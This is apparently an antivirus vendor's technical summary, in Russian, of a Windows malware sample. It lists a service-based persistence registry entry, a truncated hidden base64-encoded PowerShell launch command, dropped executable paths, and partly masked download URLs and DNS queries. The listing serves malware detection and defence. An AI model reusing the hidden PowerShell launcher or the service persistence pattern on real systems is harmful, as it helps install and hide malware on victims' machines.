Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\createaavi] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\createaavi] 'ImagePath' = '"%WINDIR%\SysWOW64\createaavi.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABIAGkAYwByAHoAdABmAGIAcQBpAHgAPQAnAEsAcwB1AG0AZAB0AHgAawB1ACcAOwAkAEwAcABvAHoAdwB2AGoAdQAgAD0AIAAnADYAMQAzACcAOwAkAEcAegBpAG0AZQBnAGIAbwBtAD0AJwBaAHIAbABhAHkAbAB5AHUAZgB0AGoAZAB...
- %HOMEPATH%\613.exe
- %HOMEPATH%\613.exe в %WINDIR%\syswow64\createaavi.exe
- http://sc#####rofessional.info/plugins/266-wcvu9ml-67633827/
- http://72.##6.87.136/6LhxIQDs6ov4EeUj
- DNS ASK do####qiuqiu.vip
- DNS ASK sc#####rofessional.info
- '%HOMEPATH%\613.exe'
- '%WINDIR%\syswow64\createaavi.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABIAGkAYwByAHoAdABmAGIAcQBpAHgAPQAnAEsAcwB1AG0AZAB0AHgAawB1ACcAOwAkAEwAcABvAHoAdwB2AGoAdQAgAD0AIAAnADYAMQAzACcAOwAkAEcAegBpAG0AZQBnAGIAbwBtAD0AJwBaAHIAbABhAHkAbAB5AHUAZgB0AGoAZAB...' (со скрытым окном)